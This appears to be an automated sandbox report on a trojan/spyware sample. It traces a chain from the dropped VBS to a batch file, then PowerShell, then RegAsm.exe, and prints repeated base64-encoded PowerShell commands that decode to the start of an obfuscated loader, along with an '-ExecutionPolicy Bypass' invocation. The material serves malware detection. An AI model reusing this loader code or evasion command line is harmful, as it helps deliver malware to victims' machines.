                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"Jump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00406DC60_2_00406DC6
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_0040759D0_2_0040759D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0169DC746_2_0169DC74
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_055369486_2_05536948
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05537C206_2_05537C20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_055300406_2_05530040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_055300066_2_05530006
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_05537C106_2_05537C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_068567D86_2_068567D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0685A3E86_2_0685A3E8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06856FE86_2_06856FE8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_06856FF86_2_06856FF8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0685A3D86_2_0685A3D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07ACD3D86_2_07ACD3D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07ACF3106_2_07ACF310
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07ACA0186_2_07ACA018
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07AC00406_2_07AC0040
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07AC0D886_2_07AC0D88
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07AC5D306_2_07AC5D30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07ACF3016_2_07ACF301
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07AC9AA06_2_07AC9AA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07ACD8E16_2_07ACD8E1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07ACD8F06_2_07ACD8F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_07ACBD986_2_07ACBD98
                          Source: f6FauZ2CEz.exe, 00000000.00000000.1609063966.0000000000445000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDocLink.exe0 vs f6FauZ2CEz.exe
                          Source: f6FauZ2CEz.exeBinary or memory string: OriginalFilenameDocLink.exe0 vs f6FauZ2CEz.exe
                          Source: f6FauZ2CEz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: Process Memory Space: powershell.exe PID: 1188, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@13/15@0/1
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeFile created: C:\Users\user\start.vbsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_03
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeFile created: C:\Users\user\AppData\Local\Temp\nsaFFA2.tmpJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeProcess created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
                          Source: f6FauZ2CEz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: f6FauZ2CEz.exeVirustotal: Detection: 9%
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeFile read: C:\Users\user\Desktop\f6FauZ2CEz.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\f6FauZ2CEz.exe "C:\Users\user\Desktop\f6FauZ2CEz.exe"
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeProcess created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeProcess created: C:\Windows\SysWOW64\wscript.exe "wscript.exe" "C:\Users\user\start.vbs"Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBi